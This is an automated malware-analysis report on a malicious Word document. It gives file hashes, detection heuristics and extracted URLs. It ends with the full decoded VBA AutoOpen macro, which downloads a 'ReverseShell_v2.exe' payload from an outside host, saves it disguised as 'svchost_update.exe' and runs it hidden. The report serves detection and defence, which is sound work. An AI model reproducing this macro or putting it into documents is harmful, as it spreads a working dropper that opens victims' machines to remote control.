Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 ba9c384c4b51d1d7…

MALICIOUS

Office (OLE) / .DOC

61.0 KB Created: 2026-03-24 11:27:00 Authoring application: Microsoft Office Word First seen: 2026-06-21
MD5: 133666dfd05442c56d93372a6af14e7f SHA-1: be276e845434ba03d7fdb9f6f880bd434cd7cecf SHA-256: ba9c384c4b51d1d7fc20c7c14443c06496c994c3c6ab6f42f72a4e9d31f3e10b
338 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell strFilePath, vbHide
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objADOStream.Write objHTTP.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        strFilePath = Environ("TEMP") & "\svchost_update.exe"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://hack.stefant123.com.pl/ReverseShell_v2.exe Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/contentTypeReferenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesReferenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/propertiesReferenced by macro
    • http://www.w3.org/2001/XMLSchemaReferenced by macro
    • http://schemas.microsoft.com/office/2006/documentManagement/typesReferenced by macro
    • http://schemas.microsoft.com/office/infopath/2007/PartnerControlsReferenced by macro
    • http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesReferenced by macro
    • http://www.w3.org/2001/XMLSchema-instanceReferenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://purl.org/dc/terms/Referenced by macro
    • http://schemas.microsoft.com/internal/obdReferenced by macro
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdReferenced by macro
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
    • http://schemas.microsoft.com/sharepoint/v3/contenttype/formsReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1350 bytes
SHA-256: 81f8d2234c72fc58a1bfc5fcab754f7a01e433dcb7994fdf0b7d9a6cd8b7225d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    On Error Resume Next
    
    Dim strUrl As String
    Dim strFilePath As String
    
    strUrl = "https://hack.stefant123.com.pl/ReverseShell_v2.exe"
    strFilePath = Environ("TEMP") & "\svchost_update.exe"

    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    
    objHTTP.Option(4) = 13056
    
    objHTTP.Open "GET", strUrl, False
    
    objHTTP.Send

    If Err.Number <> 0 Then
        Err.Clear
        Set objHTTP = Nothing
        Exit Sub
    End If

    If objHTTP.Status = 200 Then
        Dim objADOStream As Object
        Set objADOStream = CreateObject("ADODB.Stream")
        objADOStream.Open
        objADOStream.Type = 1 ' adTypeBinary
        objADOStream.Write objHTTP.ResponseBody
        objADOStream.Position = 0
        objADOStream.SaveToFile strFilePath, 2 ' adSaveCreateOverWrite
        objADOStream.Close
        
        Shell strFilePath, vbHide
    End If
    
    Set objADOStream = Nothing
    Set objHTTP = Nothing
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.